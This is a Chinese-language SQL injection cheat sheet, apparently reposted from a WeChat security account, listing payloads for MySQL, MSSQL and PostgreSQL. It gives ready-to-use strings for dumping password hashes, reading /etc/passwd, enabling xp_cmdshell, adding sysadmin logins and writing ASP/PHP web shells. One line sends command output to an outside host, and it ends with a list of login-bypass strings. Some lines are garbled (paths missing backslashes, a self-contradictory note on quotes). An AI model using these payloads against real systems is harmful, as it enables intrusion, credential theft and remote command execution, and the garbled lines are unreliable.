SQL 注入大集合

简介

SQL 注入（SQL injection），是发生于应用程序之数据库层的安全漏洞。简而言之，是在输入的字符串之中注入 SQL 指令，在设计不良的程序当中忽略了检查，那么这些注入进去的指令就会被数据库服务器误认为是正常的 SQL 指令而运行，因此遭到破坏或是入侵

SQL 注入类型

回显型注入

盲注

特殊形式注入

SQL 注入语句

下面收集各种数据库系统常用的注入语句。

MySQL

基本环境信息

# 获取版本号 SELECT @@version SELECT version()  # 主机名，IP 地址 SELECT @@hostname;  # 数据目录 SELECT @@datadir;  # 用户名及密码 SELECT host, user, password FROM mysql.user;  # 用户名 SELECT user(); SELECT system_user(); SELECT user FROM mysql.user; SELECT current_user;

用户权限相关

# 列举用户权限 SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;  # 列举用户权限 SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv,Grant_priv,References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv,Repl_client_priv FROM mysql.user;  # 列举数据库权限 SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;  # 列举 columns_priv SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;

列举数据库

# 当前库 SELECT database();  # 所有库 (Mysql > 5.0) SELECT schema_name FROM information_schema.schemata;

列举表名

# 常规 SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'  # 根据列名找表名 SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';

列举字段名

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

单条数据获取

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0;  SELECT host,user FROM user ORDER BY host LIMIT 0,1;

显错注入

# 方式 1 and (select 1 from (select count(*),concat(SQL 语句,floor(rand(0)*2))x from information_schema.tables group by x)a);  # 方式 2 and (select count(*) from (select 1 union select null union select !1)x group by concat(SQL 语句,floor(rand(0)*2)));  # 方式 3 and extractvalue(1, concat(0x5c, (SQL 语句)));  # 方式 4 and 1=(updatexml(1,concat(0x5e24,(SQL 语句),0x5e24),1));

延时注入

SELECT BENCHMARK(1000000,MD5('A'));  SELECT SLEEP(5); # >= 5.0.12

文件读写

# 读取文件，需要相关权限 UNION SELECT LOAD_FILE('/etc/passwd')  # 写入文件，需要相关权限 SELECT * FROM mytable INTO dumpfile '/tmp/somefile'  # 写入文件，需要相关权限 SELECT * FROM mytable INTO outfile '/tmp/somefile'

判断及字符串相关

# if 判断 SELECT if(1=1,'foo','bar'); #返回 foo  # CASE WHEN 判断 SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # 返回 A  # char 函数，将数字转变为字符 SELECT char(65); #返回 A  # ascii 函数，将字符转变为数字 SELECT ascii('A'); #返回 65  # CONCAT 函数，将字符连接在一起 SELECT CONCAT('A','B'); #returns AB  # 字符串的 16 进制写法 SELECT 0×414243; # 返回 ABC  # substring/substr 函数 SELECT substr('abcd', 3, 1); #返回 c  # length 函数 SELECT length('abcd'); #返回 4

MSSQL

基本环境信息

# 数据库版本 SELECT @@version  # 主机名，IP 地址 SELECT HOST_NAME()  # 当前用户 SELECT user_name(); SELECT system_user; SELECT user; SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID  # 列出所有用户 SELECT name FROM master..syslogins  # 列密码 MSSQL 2000 SELECT name, password FROM master..sysxlogins  --* SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins --*  # 列密码 MSSQL 2005 SELECT name, password_hash FROM master.sys.sql_logins --* SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins --*

列举数据库

# 当前库 SELECT DB_NAME()  # 列举库 SELECT name FROM master..sysdatabases; SELECT DB_NAME(N); — 其中 N = 0, 1, 2,

列举表名

# 列举表 SELECT name FROM 库名..sysobjects WHERE xtype = 'U';  # 根据字段名列表名 SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM 库名..sysobjects JOIN 库名..syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%字段名%'

列举字段名

# 列举当前库中的表的字段 SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '表名');  # 列举 master 库中的表的字段 SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='表名';

单条数据获取

# 获取第 XXX 条数据 SELECT TOP 1 name FROM (SELECT TOP XXX name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC

权限相关

# 判断当前用户权限 SELECT is_srvrolemember('sysadmin'); SELECT is_srvrolemember('dbcreator'); SELECT is_srvrolemember('bulkadmin'); SELECT is_srvrolemember('diskadmin'); SELECT is_srvrolemember('processadmin'); SELECT is_srvrolemember('serveradmin'); SELECT is_srvrolemember('setupadmin'); SELECT is_srvrolemember('securityadmin');  # 判断某指定用户的权限 SELECT is_srvrolemember('sysadmin', 'sa');  # 判断是否是库权限 and 1=(Select IS_MEMBER('db_owner'))  # 判断是否有库读取权限 and 1= (Select HAS_DBACCESS('master'))  # 获取具有某个权限的用户名 SELECT name FROM master..syslogins WHERE denylogin = 0; SELECT name FROM master..syslogins WHERE hasaccess = 1; SELECT name FROM master..syslogins WHERE isntname = 0; SELECT name FROM master..syslogins WHERE isntgroup = 0; SELECT name FROM master..syslogins WHERE sysadmin = 1; SELECT name FROM master..syslogins WHERE securityadmin = 1; SELECT name FROM master..syslogins WHERE serveradmin = 1; SELECT name FROM master..syslogins WHERE setupadmin = 1; SELECT name FROM master..syslogins WHERE processadmin = 1; SELECT name FROM master..syslogins WHERE diskadmin = 1; SELECT name FROM master..syslogins WHERE dbcreator = 1; SELECT name FROM master..syslogins WHERE bulkadmin = 1;  # 当前所拥有的权限 SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE'); — current database SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); — current server SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); –permissions on a table SELECT permission_name FROM master..fn_my_permissions('sa', 'USER');

显错注入

# 直接与数字比较 id=1 and @@version>0-- id=1 and user>0-- id=1 and db_name()>0--  # 将数据转换成整数致报错,可用于爆库名，表名，数据名 id=1 and 1=convert(int,(select name from master.dbo.sysdatabases where dbid=7))--  # having 1=1 爆数据 id=13 having 1=1 -- id=13 group by 表名.字段名1,字段名2 having 1=1 --

延时注入

# 延时 3 秒 IF(ascii(SUBSTRING('name',1,1))>0) waitfor delay'0:0:3'

命令执行

# 判断功能是否存在 and select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread') #注册表 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask') #备份 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc') #恢复扩展 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs') #读取子目录 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree') #列目录  # 恢复与删除扩展 exec sp_addextendedproc xp_cmdshell,'xplog70.dll' exec sp_dropextendedproc 'xp_cmdshell'

# 恢复 xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'show advanced options', 0 --  # 访问 COM 组件 ;declare @s int; ;exec sp_oacreat 'wscript.shell',@s ;exec master..spoamethod @s,'run',null,'cmd.exe/c dir c:  # 执行命令 EXEC xp_cmdshell 'net user';  # 写注册表 exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWORD',0;--  # 读注册表 create table labeng(lala nvarchar(255), id int); DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots','/',@result output insert into labeng(lala) values(@result); #读网站目录  # 写 Shell exec master.dbo.xp_cmdshell 'echo ^<%eval request("o")%^> >E:wwwroot1.asp'; --  # 停掉或激活某个服务 exec master..xp_servicecontrol 'stop','schedule' exec master..xp_servicecontrol 'start','schedule'  # 添加、删除、设置用户为DBA的操作 EXEC sp_addlogin 'user', 'pass'; EXEC sp_droplogin 'user'; EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';  # 获取 DB 文件位置信息 EXEC sp_helpdb master; -- master.mdf 位置

文件读写

# 文件读取 (创建临时表，bulk insert 读取内容到表) CREATE TABLE mydata (line varchar(8000)); BULK INSERT mydata FROM 'c:boot.ini'; DROP TABLE mydata;  # 文件读取 (创建临时表，insert & xp_cmdshell 读取内容) create table mytmp(data varchar(4000)); -- insert mytmp exec master.dbo.xp_cmdshell 'ipconfig /all'; --  # 页面无回显时，读取命令执行内容 (需目标机器可连外网) (先写入 JavaScrip，然后通过执行 JavaScrip 将命令执行内容，通过 AJAX 发送给接收端) exec master.dbo.xp_cmdshell 'echo (function(){var ws=new ActiveXObject("WScript.shell"),cmd="cmd.exe /c dir c:\";var data=ws.exec(cmd).stdout.ReadAll();var ajax=new ActiveXObject("Microsoft.xmlhttp");ajax.open("POST","http://itsokla.duapp.com/cmd.php",false);ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");ajax.send("cmd="+encodeURIComponent(cmd)+"&data="+encodeURIComponent(encodeURIComponent(data)));})() > c:e.js' --

Oracle

待完善(敬请期待）

MongoDB

待完善（敬请期待）

PostgreSQL

显示版本

select version();

union select 1,2,...n,version()

//version()函数与MySQL的是一样的

从已知表段字段爆数据

select aa from bb where cc=dd;

union select 1,2,....n,aa from bb where cc=dd

//所有的SQL语法几乎都是这样的语法来爆数据

列库

select datname from pg_database;

union select 1,2,....,n,datname from pg_database;

列数据库中的表段

select relname from pg_stat_user_tables limit 1 offset n;

//类似于MySQL中的information_schema.tables，虽然不大恰当

union select relname from pg_stat_user_tables limit 1 offset 3;

//limit 1 offset 0和MySQL的limit 0,1一个效果。

列表段中的字段

select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;

union select 1,2,.....,n,column_name from information_schema.columns where table_name=0x3a limit 1 offset 5

读取配置信息，例如数据库登陆账户和密码

select usename,passwd from pg_shadow;

union select 1,2,...n,usename,passwd from pg_shadow

//pg_shadow数据库类似于MySQL中的mysql数据库

读取文件

create table test(code text);

copy test from '/etc /passwd'with delimiter E't';

(注：网上多数关于Postgresql的语句中是双引号，实际测试，8.x到9.x双引号无效，应该用双引号)

写入文件

insert into test values ('<?php eval($_POST["cmd"];?>');

copy test(code) to ”/var/www/one.php”;

Access

待完善(敬请期待）

Ingres

待完善(敬请期待）

IBM DB2

待完善(敬请期待）

IBM Informix

待完善(敬请期待）

SQL 注入后台万能密码

</nowiki> 'or'='or' 'or=''or ='" or "a"="a "or "a"="a "or 1=1-- "or 1=1%00 "or"="a'='a "or=or" ') or ('a'='a ')or('a'='a 1 or '1'='1' or 1=1 1 or '1'='1'=1 1'or'1'='1 admin' or 'a'='a 密码随便 admin'or'1'='1'-- admin' or '1'='1'-- a'or' 1=1-- a 'or' 1=1-- or 1=1-- 'or 1=1-- 'or' '1'='1 or 1=1-- ' 'OR 1=1%00 or 'a'='a 'or'='1' 'or=or='' or =or=''or'1'='1 ' or '1'='1 'or'a'='a ' or 'a'='a 'xor ' UNION Select 1,1,1 FROM admin Where ='</nowiki>

本文始发于微信公众号（飓风网络安全）：SQL 注入大集合